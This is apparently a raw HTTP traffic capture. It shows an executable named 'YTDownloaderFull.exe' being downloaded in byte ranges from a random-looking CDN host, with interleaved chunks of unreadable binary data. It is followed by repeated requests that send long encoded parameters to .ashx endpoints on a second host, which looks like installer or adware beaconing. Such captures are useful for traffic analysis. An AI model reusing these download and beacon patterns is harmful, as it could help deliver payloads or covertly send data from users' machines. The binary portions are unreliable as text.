2.....e..Oq.....U.._p.(.Fx.Y.A..\3U..a...U..-..l.#.....v.8Q!t...a.=...
.<.2.q....../.lVy.^l.5...q..?~.s...z..V*.Q......H.....).....7....k.
Hkt..v....&...XjZ......M..I.....Q..*)..c:..jwuU....... .!. ..NxH..6Pp@
...A..v..[iE'.:{...},..p.r[...).n.:...A.'c.g...>.d...c`.K....z..|.0
U.d.f...n../c.~...._-EzW..5.......bG.5o.>{hF..=u.RS*..}5nV.[.. K...
.z....og.&...!U.-.....x,..X.La..3..H.l......|..bf...(..j...........s..
...7......-..<.... m...q......E..... .6....~....B.d.R.U.dZ..x.i....
.V\.s..Q>c.Y......7S...|......g... .{.>b.......O..j=.I.....;....
.E......WpZ.V.f.A.*Y.t...,i...2..... ...2....K....W......y.....A*v
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=4750000-4999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4750000-4999999/7202623
...*.{m......=..b....M....y.y.....&...a....O.`.^.q.......9tv.O...}....
!.pbL..M.nN....4s...|.Q...2.....(...Y...3n.9.v.Z#..l..F...,'.....C....
....Ch..4.....< .69/D....H.$(.D%...{7...._[..N.|.(..GA..U1..7u|..B.
/.CX..$...`./.....&p-...\...`.......}..2xG.b..`..:.l...e.....y).[...q.
.0..v.a....p.....M{[email protected]..]....z....:..l....>.4..4.;FE....Wn7
......x.t...'0 ..).lj...$..ZNA.<... #....#.!\u9....o.5.....Q....2.\
!.r........SS..{]o..u A.c..4.5.A....K....n.........C..Z.....tH......7.
....rX. .~.7.....;y......i..m.s.ES...I..Sd0..P......I.A.. .O..k)......
m.K...A,..........g.~dA.......j....7.............U.7G..SG.5.#]s...u..'
^...U.1.6..F.i|....:.....v.c..N9.....,.E^...!(..X...i$v.wf....'e...ey.
y.j......k6..}.G.*2.....[ ..U..g.....A....Up.8.]...nK./........6.....2
...'E.....J......tWS..E....A..,....Q..._,s.T..H.U.W:..n../...Y.c...>
;6.~...j........,-R(...../[email protected]#.....B....O...~.d...j.G3o..9....
..e. .Tq...i..AR.......}c.'..B.......O....FA..V.P.K..6*....P.....c.#.Z
u~.....HA_.......`...\.gz.N.#|..f..;u...ps_E........J|.H.C.x..........
G.bx..42.0...]A.q...2.(Y......HX....e..G qG0....a..%-".V..Y.....J.....
....].......I."...'..*...........O#..N...2.qJ._...l.:...u.......'[1(R.
G...#.Y..).|..w@.........."..Mi........k..I..p....J2./........].4D..I.
.....Y...j..5.t.......X .......fP!4...T..$..G.....T.L..|L.;.h;..Ko...r
. .....Y..T...>0fU...Ed..:....E.....T....i.|)..hU..../..x..$.X..(..
..v..).oF.y..k.."..#......5-.p...]........_.....y....q.!ytm(~?]....-1.
i........d:.K...d..K~.T.>. .k.Y...-.&..C(E..R^....h...$....i...
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=5250000-5499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5250000-5499999/7202623
.}v.X..D..Y.Gd1..<"'.RX..-Lf.i^I...*.....v.VV-i.~.".wjF|/.........&
gt;jYK.Z..,...I.o...'.......$...K1.....@0.. ...K.. .)T......,u...Y...a
[email protected] .xb..Od.p...5";..$. &.<...M1.... rL.[N.|...E[Ff....<..U.
...d.r.N.......;.O.{.-}..4.~..i..X...KN.........bH..W...t.>S.G.....
*a.V.R..0.y..E.!.n..L."u....*.ko.........v>..t.M2...s6.......J....M
.........N.Yr...A.j..S..y}.S.(.Z...<.q..?O'`..)..Z_..J0R.i...j1.]=.
......oYe...Q.6..........9U.SP.P3.|.......Ee....V........L~Wx..q.P>
w.L~...b..v..l...L....-..jc.>.9v...3o:.7...I..cI'Y....rc.......{7..
z.a....G?....,....jZ?..m..f~..O...A.6....4.P.F.Bp..$......o...X.....b"
.....BKj...z.N..ZY.....=...`.!$...............h.(....[..)(.i...K{.....
...3.....D-.l.5...\..o..`../.lb.6:.1.# 79V...e;....M..;k.V..@q..../9#/
9u...%|.I.k.s..v\..E.f..m.....2.z......9.K(a.^U.L.x.j../K...j.|.r....~
...y#........t..=...L.9..u......s[x.j..4..v.<[email protected].>c5.t
{]...8[4...O.p.g...^A.....`.Aw{.L.hi..C]e.#g.5..-.[*.f.?......\ ...*Q.
..B..>."..V....=.../.R~...8l.....PjWO...7.V..P........Kpm.j]YVH....
N..5*..40..I:./.......4....W#...;YY....8...(.^../....jW.A..a..;..._>
;.e..P.....J.F...V..$..._.....rw..^..9?.`...}t.92....V...P4j%..X.O...h
./I...'1*.3...Pom1>F.DZ<..l.WPW.. KJ..g....8...Tp..7._.OM~.F...}
.].LI1A`.?.^.m. X..JQ...s....c..]Lmh..u./%N...E#By...t..1].......I."..
.H.Qd=.Rv.1.@..`.@.....!.u.G.j.".......8...`C@....[....6.Us..).,9.q.l&
gt;tu?...R.yfK.Fjv...:GG.?.d.s<....B.0....*..H>..l!:s..[.X....).
sHgZm..J.C......h.D...N...w.0......_s.W.p..3..`.....qi...$'7b..@..
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=5750000-5999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5750000-5999999/7202623
........k..G...0..e..N..R:...e...CmQ........K..\....1.Bd..m..T.|.9.<
;.S.'. B..y..I..........V.<GQF.{e.o.BXn..IW..=L/.I...... [c....q.d,
<.$.k.t=...S....0o.....%..g...B.O,.w.H..bC.e..1.$.8.......="/.4x.#.
....M....z2.IBa..hW1..1.u..Z..Z.......0T.M.......0ny.f...F..#.%...W.J.
.o}6mBT.b...M*...o..%J.....E...qKS.....E...J.|..U....'.........9z.....
D.RR.......-_ l..').!..'u.....<iU.-............ .......C^.\....s6..
GuD*..rUN...N4L...XM9..[..T.?~..B{u5...I........V.....F%..._.|../.$P..
. ...(.6X..q51.nP."s..6..t.....~...PF........C...oM.k.......$..g...~9*
.q..S.A...O....D8y........G."....^..l......1.W0.....\t..pH....R......B
#.$...G........$..%z..&...A..m...}|......s..;O.n...;". .e..ef.`Z.k....
..s...?q..*......;.~,Ig(...._.....MZ...^_U.x`p...|..O._.Wl.W..<...q
!.2.B.....m..]$...~........_!q..X.c........JJ......6i...........3^~...
'.,(.~.=;..n.d......8.r........?9.Yr..@.......\.....;.L....^.p.Or%C..G
..#-......P[*eF`x.r?..,$s~3.)......3m..b%..1....*[email protected]. .$8{x..Y.3.W
.I.....p.:$.;.....]A."....T..P.9%...z}..!.l.f=.%......d.`......}~.x...
)..V=/^..l...M.._C..LA%..A.S4J...x..........Ct........z.C\.).n.th..Hs6
.Qse.h....F#.....n..k....$..xA.J\...Ge......k...I.1I.....p.Mxh|..{~.~.
...}..P..5R..........*^z.L.V.~.V.Z..u..y.\..F.v..f..$bs..UXO.TH...X.c*
..%%4...J.....U..l.r.e..5.uK...;..2.... ..U.....K..v.D0H..u.R3.}8../..
..r.lC.<l.wm......z\.p..<b'v. A.R..T..^..s...j...Mj=............
.m......d.S.....|....J.%..b...Y.....9...>..C...`....0.DB...........
K|#....C..p(O....3l5......>{.:....~s.0...9......^.k..>..<
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=6250000-6499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6250000-6499999/7202623
....?.2..i...~-..<...$>......g...,..."...o=..*Jk2..x...u...Ge...
.....hp...JL...e.@...{..L.=/)0.vNt..\7..#i...0.........lE]%..wh.}.;..[
. J...\I.5..A...^..$.....1.nJ....o|..=.W....tm.CqZ(.b7...p9eUe.....<
;..Y%_.j0?.j<di.\<..".=^R{{..Y......~6.\]...Y..Ce.A..&].L.......
Nf.f.z...Qu!.6....D...g;.;....^Z.'..d99.v...5.Y....[......A......GSg..
:.L<..:.Y.1..X0.S.......F,...p.}...5a....0...w..:.....u.sk.v.[..t..
......|"...n5..F.../j.E..j,4...LM..(Z...1..`7....3.b.[........J....o.X
.d.V.SZ(8.~"...K.?...#K:..(8...........?..%V....u.e.#.....1.Bw....C.8.
l..*.....(k.....N.%.o.:C.T..8...2..=..q..f#..n...X....s.=....7.gR>.
SZ..s.W...r.^9..g............J.l....A...*i.m..H.....n"]N.r.....y:(....
x.KN#..........J.fSh...... ^.....B...T".).J..-....x..6G.......4....t..
...$...f.rF.XJ....[{.0.....<F.k.\.\.;:&...;A..|...E....s....&.8P.r?
&./...4>...............#f..ZSOS..G|.v$.......k?...m....t.a,A.V:..Xh
.r.1......G*.g..V...EG._.OZ.y]J..A...0.....[....MN. ..b.(.$\V.<.e.(
wjc0..k.........yj...A.q.....^..x.k*..g.\.'...W...u........F.BD....]$.
N/....OJ%..Al|....VS...-Uf..7...|Fr.'...a\........Hv.....j..;f"....=..
r..N.s.vWk...4i.Y.....q:G...6.....G.0...6.Rg.......p...0....v.h7mo.. (
).*oE.1.......6~..e...G.$...)....B......!..0.(...*....!..............s
...RH.e..^.$...s.>.c.b^W..v..j...^T.o.=qFqLr....I..5DO.............
..3..L, m...Y.g.FLj.3|...bOR....Pz. 1r.:...y.j....I&e..E........C1u..:
?l.]0......)a'..SLw..r:hdH...B..B8.NOA....&a.o..Y.}.<......Y...3...
.........Fs...Q..ri.-.8-.......eZ..nt..#W.... ^...eVn.$X.7A]/.....
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=6750000-6999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6750000-6999999/7202623
Y..D.o.~...l.}..Wtp.x...{......oo.a..|.kw....1..........8..D.OG.......
.dx..z.tn..~N.I...._...7...h.<9.|...0..........og.k....'...$.'*R..S
U.n(.......C..8.>....U.2....B.gB...hqW.c...a.........F^|P......%.$-
h.c..9N.O..4..K....c..."5.;...Y.a%c..3q..h.iabv..A.q.........G.vm.I..Q
......].].z .2Hm.?=.B..#.jp.|..\......j.....}..J..W .;...<G9..g.T=.
t4.......>.6Hyu"@..R(...i....d]....U...\6B.%.....c?.._nv.-..o..@E..
g.v...<.01..SM0.6p}..sX-v...h....(/.........O..E.$FW.l.~...q`Z.p.T_
...=o2...v;[email protected]'.....|...b...!.4"..g....E7......nVJ..Ja...(J......%
[email protected].$..h...4.h.2pm#Ms..n...r..;.~....Yj....f..m.~. i.O(.r.$..m
....z.....z.i.........u.ea..%..c5.........Y....*'.w.8....r..}..?}.....
.I.....-.z..@Z|. ..L......u$..4M.....z...G....w......^G.X........].j%y
l.......('.hv .h84..8E..........[[email protected].*V/!M...O.....
.g.-(e.......E.*..caV...S.L...N.C..a y...>.z>9n.a...0.z.~....8.P
.L......W&.........#L.q .n&.s...:O. .6....~..W..U.3...x..f..{[.ST. ...
R.....f..`.s.;.^...x....U.....Kg(nV9....;.H. ......r..... .C"...M._.\8
.s&.C..2.Q....-..3u.;j..$..C.{..J .......i.... IDE....x.......5d....;.
..[.!5.\........0D..m..\.....).....H...a... K..*W..79.....J...Rz>.z
..a.....*.......x..d.................f..&h.m...Wv..<..5:.['cY..y...
T......Z./)`h......*.'........w...'...T....u...m6...)..v.^...C..a.V..&
~&...&.\...k.)....m....OU..h.~.P...iq~....E....S8........4.O}..1{...P.
....t#.5...-rH.zq.j=.....Hd.. &...L....v...3....V.U!.....x.?..8.K..x".
..d;_...=..gA......XQ..,I0......h....e.NO:..x.lj..N.^.].H&8.B.B.. 
<<< skipped >>>


GET /9313.ashx?e=KSz5qzb2KgILjT49fHfOTEy1U5i0Jcc8jvdcLv9L0ULeyzV7AofXlljJzRxQxlEZcdkrDIlyRZ3  QFrihM290CN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOp6IOl1JW3sHB9kWS7dXZ6elIsRF9MX88CO265/Kjb 488/XPfhk4uBUiNRLLAgct5oMOyZur3pkEghD3HnQv1a/gCZD66/sdSVKFBzVQWjB05oujAfFWpTOgMsHybNe40DPXjVNm at3mAerssgcNWUIia6WITopWDcT qioK0TvO7tQdS7Pb5LlxRWf0cqGrN/G5zN QDpcSQHkYgFaOBv7DByqGp2noDEWmBK24T6wUFUm6AwzmaIYfI6O6ruLd0T1shsZ 3kYZJCvGTB0II76PaOLcDiT6i7uu4ZLp9tYOQ0C4B6wOMHFWmaAPLjzUoonoBGYhxQckdTtpt CJE/NAFMRO0hJ42ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /9313.ashx?e=wlkQ3WKgYpSXQ02 mivEAEQ1GWwIMthwtyLw6hNuJQGAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXc LjjRvaSA4fJsKHIM1ro1Fhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PAjtuufyo2/uPPP1z34ZOLgVIjUSywIHLeaDDsmbq96ZMtJ XAicqhKxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:36 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /11153.ashx?e=NVqRyNkruooT/daslwwbUvMtz3dZh2P6aMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLxpJZRDiatLKZwV0mx4LJvkCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOp6IOl1JW3sHB9kWS7dXZ6elIsRF9MX88CO265/Kjb 488/XPfhk4uBUiNRLLAgct8wjjUrZ/qJkmB0RNQ 9BzBNqeRPeOqgjazACGY CgK6eqXaZH4mK3kqgSNqV7u8iR3AQSpIJXB7L4uKB8G6McV84RHzLnn1bXMAwyoiKXvjmRmxRGf9zFEKY/VNO/cxtzOS6jq UbgqBz1jcZZbz05IQbYQvC6sk0cdVK5OLpFHVdPwqUuqOwA003r2uKrGnlnotumY2YUYLnl7FCVUbw972nxHK4nudtK7r9jGEfZIEoRN 6ZHvZxCVNbsRxhip/uvaFUgbktt1b8Epic0SPi6TzbxlgO9RcTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /11153.ashx?e=4mC0vXGWFtoJz2TpdH2qbEQ1GWwIMthw7wq1eibGVAGAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXWPgIqkg/KntpjkZwwc6dH53FRTfUsruhOl6T0Yw8cmQjgb6v7cXpPu93RkgrfPIdK/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGd51jxu8kbC0X1dGgWnCEBcBeHgs9Q765QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiaF8KpepynoFA== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:37 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /27136.ashx?e=043Mckb8Lnhw7iCtSAyu/0Q1GWwIMthwdQXWEODVVZKAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXed4zY8kJssz4u3oGHN86wPQVtpqSKGA7U/Xst3NHAatCNiNeNKIpAJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxZjnXlvApvj8 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=bNFVvuIwcz4F7tXbo2OpjbeGOAxO2gKXKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMY3q3Uh zLol JfVwpv1Wv16XIqLxILHtgx1Ht egA6a3os1yMNpRF7gBtB5 kYUpdpaCi3i8nACSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJpHZ15mOZ7RI= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=LCnUzM5l8JKBkxMrsxJdJt5jOExRmJjc8lXlmdaIM2I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo74r1XQZFERKa2dF0VKZsa0uea6nUoHK BPEhRyyBD7DN1CnChhvZ3S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb68Tidbbz5Drk= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePN2I0qd4G3ExvDbcr2ZCWDFAL52sIXt4UoKtXISWiV4lHG3D5R3V5O0a/7yn1m/tGd3P3SqySAb8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rJO6tQ6g6EocBZm5XDIx10XwGDIKLmaUks= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeMbGtOpbXm9kJjesXPvEdr8s IILilpWF0xztg6 4zwmphq5YRs3Ua3kOLZWZ3INLADa67vNBCQrY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VDoD6EkHq6EkDDzmFEVLtgFCP02w6EunE= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOfXhYbE9Wm3iuFUsM2slALjgb6v7cXpPvvDUPlfCzRdlPqkO/QXEWVboHDCUOFdfNUw yx3IACsY0 /eJ8LmRXU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOTRcHKuVeTpSxfMJgkYeRrKYX3Ti/i3YNxO48S9k5zx42nGtSBySjjX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMBHkkQ8dewzaRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyTurUOoOhKHAWZuVwyMddF8BgyCi5mlJL HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=043Mckb8Lnhw7iCtSAyu/0Q1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePEEASnTAt8o vdWl3XnoKt0JQd5HxgIXd4Ck/GAouPo3pu1a2/pSyUlKYWIS4b/TwQz5kcPJsPBXgEPYkm2R 4CM84BubBye2orW/U9pNYEne5haHOFLYKd5SlKONgbzwnZSRpvuXhKkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/  a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMC09xUUAqoccNCUHeR8YCF3RMhMhveZGB/8e7kw1yV54DHh RP9FBwluXtX58AbVGLqY0nw4ErLtxha/ J3llgZ187AT1rhu GGW2I O4PkTUw1aLHDaMdxJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovfwqbgkyABd HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
